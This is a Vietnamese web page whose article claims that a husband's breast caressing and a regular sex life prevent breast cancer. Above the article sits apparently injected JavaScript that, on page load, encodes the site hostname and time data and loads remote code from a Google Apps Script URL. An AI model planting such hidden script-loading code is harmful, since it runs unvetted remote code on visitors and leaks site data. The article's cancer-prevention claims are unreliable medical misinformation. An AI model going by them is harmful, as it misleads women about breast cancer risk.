var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Bàn tay đàn ông giúp phụ nữ ngừa ung thư vú

Đừng quên một điều “vắc-xin” quan trọng khác: bàn tay của người đàn ông lão làng. Bạn lựa chọn áo ngực thận trọng để phòng ngừa ung thư vú, duy trì chế độ ăn uống và sinh hoạt vừa phải.

Đừng quên một điều rất quan trọng nữa: sự giúp đỡ của đức lang quân. Hãy chọn chiếc áo ngực thật cẩn thận để phòng tránh bệnh ung thư vú, đồng thời cần ăn uống và sinh hoạt đúng mức.

Kiểm soát lượng khúc dạo đầu ngọt ngào lành mạnh, kèm theo động tác âu yếm đối với vòng một sẽ giúp giảm nguy cơ mắc bệnh ung thư vú và cải thiện cuộc sống tình dục của phụ nữ.

Đặc điểm dễ nhận thấy trên cơ thể phụ nữ trưởng thành là phần nhũ hoa nhô cao và vòng ngực căng tràn. Những người có cuộc sống tình dục điều độ càng dễ sở hữu vòng một khỏe mạnh và săn chắc. Nhiều nghiên cứu đã chỉ ra rằng, các dấu hiệu như ngực đầy đặn, núm vú hồng như ngọc, quầng vú có sắc tố bình thường… Cho thấy sự phát triển toàn diện của buồng trứng và tử cung.

Điểm G nhạy cảm trên cơ thể phái yếu không chỉ tập trung ở âm đạo mà còn nằm ở ngực. Khuôn ngực căng tràn sức sống, ẩn hiện sau lớp áo, cũng có thể khiến các quý ông bị kích thích trước khi hai vợ chồng quan hệ. Các hành động nhẹ nhàng như xoa bóp và hôn nhẹ lên vùng nhũ hoa sẽ gợi lên khoái cảm mạnh mẽ của phụ nữ. Khi đạt đến đỉnh điểm khoái cảm, cơ bên trong ngực sẽ co bóp mạnh mẽ, máu lưu thông quanh vú và các tĩnh mạch giãn nở đáng kể. Lúc này, âm đạo cũng tiết ra nhiều dịch để chuẩn bị cho một trải nghiệm tuyệt vời. Sau khi cơn khoái cảm qua đi, núm vú và phần xú xẹp dần, các tĩnh mạch bình thường trở lại.

Các quý ông có thể giúp phụ nữ phòng ngừa ung thư vú bằng bàn tay của mình.

Cơ chế hoạt động có tính quy luật này của khu vực ngực trong mỗi cuộc tình là một phương pháp vô cùng hiệu quả giúp máu lưu thông, đóng góp vào việc hoàn thiện hệ bài tiết trong cơ thể, chính là lý do khiến cho sau một thời gian gần gũi với đối tác, vòng ngực đột nhiên trở nên săn chắc, đầy đặn. Nhiều phụ nữ đã sở hữu vòng một không hoàn hảo trước khi kết hôn cũng đã tận dụng được cơ chế này để tăng cường sức hấp dẫn của mình.

Duy trì một cuộc sống tình dục lành mạnh và điều độ, với sự hỗ trợ đặc biệt từ chồng, sẽ giúp giảm thiểu nguy cơ mắc các bệnh liên quan đến tuyến vú và phụ khoa. Một cuộc sống tình dục hài lòng có thể cải thiện hệ miễn dịch của cơ thể, duy trì hàm lượng tế bào CTL (Tế bào T độc tính) ở mức hợp lý và giảm thiểu nguy cơ mắc ung thư vú. Vì vậy, đây là một cách hiệu quả để bảo vệ sức khỏe của chị em phụ nữ.

Theo tờ báo Đất Việt.